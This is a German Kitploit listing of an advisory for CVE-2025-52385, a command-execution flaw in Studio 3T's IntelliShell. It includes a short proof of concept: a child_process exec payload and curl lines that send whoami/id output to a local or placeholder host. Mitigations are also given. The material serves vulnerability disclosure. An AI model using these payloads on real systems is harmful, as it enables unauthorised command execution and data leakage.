Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
Tools/GitHubGitHub/kov404/cve-2025-52385
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-52385

Software: Studio 3T v.2025.1.0

Sicherheitsbericht: Studio 3T Remote Command Execution

Überblick Eine kritische Sicherheitslücke in Studio 3T Version 2025.1.0 und früher ermöglicht es einem entfernten Angreifer, beliebigen Code über eine manipulierte Nutzlast auszuführen, die das child_process-Modul in der IntelliShell-Komponente ausnutzt.

Details Schwachstellentyp: Remote Command Execution Betroffenes Produkt: Studio 3T, Version <= 2025.1.0 Betroffene Komponente: IntelliShell Angriffstyp: Remote Auswirkungen: Codeausführung: Ja Denial of Service: Ja Privilegieneskalation: Ja

Beschreibung Die Sicherheitslücke ermöglicht es einem entfernten Angreifer, beliebige Betriebssystembefehle auszuführen, indem er eine bösartige JavaScript-Nutzlast über IntelliShell sendet und dabei das child_process-Modul verwendet. Es handelt sich um eine blinde Ausführungssicherheitslücke, d.h. es wird keine direkte Ausgabe an den Angreifer zurückgegeben.

Angriffsvektor Stellen Sie eine Verbindung zu einer MongoDB-Instanz her. Senden Sie eine bösartige JavaScript-Nutzlast über IntelliShell, die das child_process-Modul verwendet, um beliebige Betriebssystembefehle auszuführen.

Proof of Concept Um die Sicherheitslücke zu überprüfen, führen Sie die folgenden Schritte aus:

Richten Sie einen lokalen HTTP-Server ein:python3 -m http.server 80

Führen Sie die folgende JavaScript-Nutzlast in IntelliShell aus: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

Alternativ verwenden Sie den folgenden Befehl als Verifizierungsvektor:curl http://site/$(id)

Referenzen

Studio 3T Offizielle Website

Studio 3T GitHub Repository

CWE-78: OS Command Injection

CWE-94: Code Injection

Gegenmaßnahmen Benutzer: Aktualisieren Sie auf eine gepatchte Version von Studio 3T (falls verfügbar) oder vermeiden Sie die Verwendung von IntelliShell mit nicht vertrauenswürdigen MongoDB-Verbindungen. Anbieter: Beschränken oder bereinigen Sie Eingaben für das child_process-Modul in IntelliShell, um unbefugte Befehlsausführung zu verhindern.

Danksagungen Diese Sicherheitslücke wurde von Kaio Mendonca Pereira entdeckt und gemeldet.

Tool herunterladen